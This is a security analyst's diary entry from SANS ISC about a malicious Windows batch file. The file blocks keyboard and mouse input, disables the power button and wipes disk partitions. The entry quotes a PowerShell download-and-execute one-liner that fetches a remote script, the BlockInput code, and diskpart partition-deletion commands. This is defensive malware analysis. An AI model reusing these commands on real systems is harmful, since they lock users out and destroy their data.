[SANS ISC] A Simple Batch File That Blocks People, (Tue, Jan 4th)

I found another script that performs malicious actions. It’s a simple batch file (.bat) that is not obfuscated but it has a very low VT score (1/53). The file hash is cc8ae359b629bc40ec6151ddffae21ec8cbfbcf7ca7bda9b3d9687ca05b1d584. The file is detected by only one antivirus that triggered on the “shutdown.exe” located at the end of the script! Why is this script annoying people? Because it uses the BlockInput() API call through a PowerShell one-liner:

powershell -exec bypass -w h -c “(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr(‘hxxps://phoenixthrush[.]com/payloads/scripts/disabling_user_input/disable_user_input.ps1’)|iex”

IWR is the abbreviated PowerShell command Invoke-WebRequest (like IEX and Invoke-Expression)

Here is the PowerShell code downloaded and executed:

# requires Administrator
$code = @’
public static extern bool BlockInput(bool fBlockIt);

$userInput = Add-Type -MemberDefinition $code -Name Blocker -Namespace UserInput -PassThru

# block user input
$null = $userInput::BlockInput($true)

If you don’t know what is the purpose of the BlockInput() API call[1]. The function expects one parameter: TRUE or FALSE. When TRUE is passed, it blocks keyboard and mouse input events from reaching applications. From the user’s point of view, it means that no interaction is possible with the computer until the API is called a second time with “FALSE”. This API is provided by Microsoft to prevent the user to perform actions when the computer executes sensitive operations.

Tip: most people don’t know but there is a way to “unlock” the computer: Just press Ctrl-Alt-Delete then select “Cancel”.

The next one-liner used reconfigures the way the power button works:

powershell -exec bypass -w h -c “powercfg -setacvalueindex scheme_balanced sub_buttons pbuttonaction 0”

powercfg.exe is a standard tool provided by Microsoft[2] that allows interaction with power schemes.

Then, the script drops two scripts on the target:

set WshShell = wscript.createobject(“WScript.shell”)
WshShell.run “””C:WindowsTempx.bat”” “, 0, true

The file x.bat is a long script that destroys the victim’s computer. Here are some pieces of code:

:: deleting some Windows partitions
echo Select Disk 0 >> y.txt
echo Select Partition 2 >> y.txt
echo Delete Partition Override >> y.txt
echo Select Partition 4 >> y.txt
echo Delete Partition Override >> y.txt
diskpart /s y.txt >nul


:: creating a message box
echo msgbox”stupid b*tch”,0 , “get rekt, ur PC has been f*cked” >> y.vbs

That’s the first time that I see a call to BlockInput() in a batch file. This is a common anti-debugging technique implemented by malware to prevent the Analyst to interact with the debugger.

[1] https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-blockinput
[2] https://docs.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Source: Read More (SANS Internet Storm Center, InfoCON: green)

You might be interested in …

[ThreatPost] Crypto Hack Earned Crooks $600 Million

All posts, ThreatPost

In one of the largest cryptocurrency hacks to date, cyberattackers reportedly stole millions from the decentralized finance (DeFi) platform Poly Network. Source: Read More (Threatpost)

Read More

[BleepingComputer] Linux version of HelloKitty ransomware targets VMware ESXi servers

​The ransomware gang behind the highly publicized attack on CD Projekt Red uses a Linux variant that targets VMware’s ESXi virtual machine platform for maximum damage. […] Source: Read More (BleepingComputer)

Read More

[SecurityWeek] Source Code Security Firm Cycode Raises $56 Million

All posts, Security Week

Cycode, a startup that specializes in source code security, on Tuesday announced raising $56 million in a Series B funding round. read more Source: Read More (SecurityWeek RSS Feed)

Read More